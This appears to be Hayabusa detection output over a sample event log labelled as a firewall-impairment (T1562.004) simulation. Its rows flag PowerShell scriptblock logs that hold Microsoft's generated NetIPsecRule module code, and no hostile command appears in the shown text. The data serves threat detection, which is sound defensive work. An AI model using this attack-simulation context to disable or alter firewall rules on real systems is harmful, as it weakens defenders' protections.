[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 